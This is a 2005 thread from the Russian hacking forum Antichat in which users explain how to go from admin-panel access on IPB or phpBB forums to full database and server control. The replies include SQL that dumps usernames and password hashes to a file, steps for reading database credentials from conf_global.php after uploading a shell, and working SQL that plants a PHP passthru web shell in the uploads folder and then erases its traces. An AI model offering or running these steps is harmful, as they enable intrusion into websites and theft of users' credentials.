ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Можно ли ли получить доступ к Базе даных,имеея доступ к админке в движке Ipb ?
  #1  
Старый 24.12.2005, 03:29
Аватар для *Crimson*
*Crimson*
Новичок
Регистрация: 23.12.2005
Сообщений: 10
Провел на форуме:
76612

Репутация: 8
Отправить сообщение для *Crimson* с помощью ICQ
По умолчанию Можно ли ли получить доступ к Базе даных,имеея доступ к админке в движке Ipb ?

Можно ли ли получить доступ к Базе даных..имеея доступ к админке...в движке Ipb ?
 
Ответить с цитированием

  #2  
Старый 24.12.2005, 07:06
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

идем в SQL Management->mySQL Toolbox внизу в окне можно выполнять sql запросы.
 
Ответить с цитированием

  #3  
Старый 24.12.2005, 11:53
Аватар для vorishka
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

У некоторых там есть и бэкап БД где-то внизу...
 
Ответить с цитированием

  #4  
Старый 24.12.2005, 12:53
Аватар для *Crimson*
*Crimson*
Новичок
Регистрация: 23.12.2005
Сообщений: 10
Провел на форуме:
76612

Репутация: 8
Отправить сообщение для *Crimson* с помощью ICQ
По умолчанию

пасиба....
счас посматрю...
 
Ответить с цитированием

  #5  
Старый 26.12.2005, 02:12
Аватар для lka
lka
Новичок
Регистрация: 15.12.2005
Сообщений: 2
Провел на форуме:
4801

Репутация: 0
По умолчанию

Такой же вопрос, только форум phpbb. Конкретно нужна таблица phpbb_users. Есть пароль одного из админов, могу заходить в админский раздел. При попытке сделать копию БД, частично копирует, потом пишет:
SQL Error : 2013 Lost connection to MySQL server during query
SELECT * FROM phpbb_posts
и всё, видимо, битая таблица (при этом структуру БД копировать можно, а толку?). Сжатие в gzip не работает (сервер не отвечает). Если дописать phpbb_users как отдельную таблицу, то тоже не копирует, т. к. должен её прицеплять в конец, а затыкается раньше (SQL Error...).
Версия форума 2.0.11. Кто-нибудь посоветовать что-то может?
 
Ответить с цитированием

  #6  
Старый 26.12.2005, 02:22
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Если знаешь полный путь слей её в файл командой
SELECT username,user_password INTO OUTFILE 'полный путь до файла' FROM phpbb_users
При условии что можешь выполнять SQL команды
 
Ответить с цитированием

  #7  
Старый 26.12.2005, 02:43
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Если речь идёт о форумах IPB и есть возможность залить шелл, то заливаешь его, потом смотришь в корне форума в файле conf_global.php имя юзера и пароль БД, потом заливаешь урезанный PHPMyadmin от rst.void.ru, заходишь туда, вводишь логин и пасс и ты в БД и делай, что хочешь.
Про репу не забываем, если хоть чем-то помог ;-)
 
Ответить с цитированием

  #8  
Старый 27.12.2005, 04:06
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

если конкретно для ipb то шел легко заливается командами (если хватит прав естессно)

UPDATE ibf_members SET name='<? passthru("$cmd"); ?>'WHERE id='0';

SELECT name FROM `ibf_members` WHERE id='0' INTO OUTFILE '/PATH_TO_FORUM/uploads/shell.php';

потом прибираемся за собой
UPDATE ibf_members SET name='Guest'WHERE id='0';

и ищем наш шел в uploads
 
Ответить с цитированием

  #9  
Старый 04.01.2006, 22:10
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Цитата:
Сообщение от lka  
Такой же вопрос, только форум phpbb. Конкретно нужна таблица phpbb_users. Есть пароль одного из админов, могу заходить в админский раздел. При попытке сделать копию БД, частично копирует, потом пишет:
SQL Error : 2013 Lost connection to MySQL server during query
SELECT * FROM phpbb_posts
и всё, видимо, битая таблица (при этом структуру БД копировать можно, а толку?). Сжатие в gzip не работает (сервер не отвечает). Если дописать phpbb_users как отдельную таблицу, то тоже не копирует, т. к. должен её прицеплять в конец, а затыкается раньше (SQL Error...).
Версия форума 2.0.11. Кто-нибудь посоветовать что-то может?
gzip отключи и будет тебе счастье в виде *.sql (вроде-бы)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социальная инженерия. Профессиональное программирование. Последовательный взлом dinar_007 Болталка 15 23.12.2008 12:30
химия своими руками silveran Болталка 43 11.01.2006 22:05
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ